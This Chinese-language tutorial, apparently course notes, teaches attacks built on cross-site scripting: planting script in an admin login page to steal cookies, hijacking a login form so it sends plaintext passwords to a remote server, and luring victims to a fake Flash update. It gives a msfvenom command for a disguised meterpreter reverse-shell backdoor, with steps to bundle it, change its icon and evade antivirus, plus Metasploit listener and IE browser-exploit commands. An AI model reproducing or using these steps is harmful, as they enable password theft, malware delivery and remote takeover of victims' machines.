文章目录
- XSS——后台植入Cookie&表单劫持(获取明文密码)
- XSS——Flash钓鱼配合MSF捆绑上线
- XSS——浏览器网马配合MSF访问上线
要想获取有效的cookie,需要:1、网站本身采用cookie进行验证;2、网站未做http-only等的防御手段。
XSS——后台植入Cookie&表单劫持(获取明文密码)
- 后台植入XSS获取Cookie,主要是在登录成功的文件中写入XSS代码,一旦有人登录成功访问登录成功的代码,就会触发XSS;
- 表单劫持,找到将用户名、密码提交给的特定文件,然后在文件中写入XSS,将明文用户名和密码发给远程服务器。
- 后端php代码中的
echo
都会输出到html页面;html页面中的js代码如会被
浏览器执行。- 表单劫持主要解决网站不使用cookie进行验证;获取明文密码。
XSS——Flash钓鱼配合MSF捆绑上线
条件:Beef上线受控后或直接钓鱼(受害这爱看sese)
- 生成后门,
msfvenom -p windows/meterpreter/reverse_tcp LHOST=X.X.X.X LPORT=6666 -f exe > flash.exe
- 生成钓鱼网站,立即下载捆绑文件(正常软件+后门文件)
捆绑文件:
一起压缩两个文件
这样就生成了一个捆绑文件。下一步使用
资源修改器Restorator
更改压缩文件的图标,使得其更加逼真。
为了更加隐蔽,还需要对后门文件进行免杀处理。
- MSF配置监听状态:
use exploit/multi/handlerset payload windows/meterpreter/reverse_tcpset lhost 0.0.0.0 # 0.0.0.0代表本地任何网卡set lport 6666run # 监听
- 为什么点击该钓鱼网站:beef受控访问;某种爱好,提示flash版本低,需要安装新版flash。
XSS——浏览器网马配合MSF访问上线
条件:Beef上线受控后&直接钓鱼(浏览器存在0day),这种方式是直接攻击浏览器,生成带有网马的地址。用户一旦访问该网站,直接攻击浏览器,获取主机权限。
- 配置MSF生成URL(cve)
use exploit/windows/browser/ms14_064_old_code_executionset allowpowershellpropmt trueset target 1run
- 诱使受害者访问URL,思路:中了XSS之后,用beef直接跳转到网马网站
若漏洞是针对IE浏览器的,使用IE内核的其他浏览器也可能受该漏洞影响。注意漏洞的利用条件(系统版本、浏览器版本)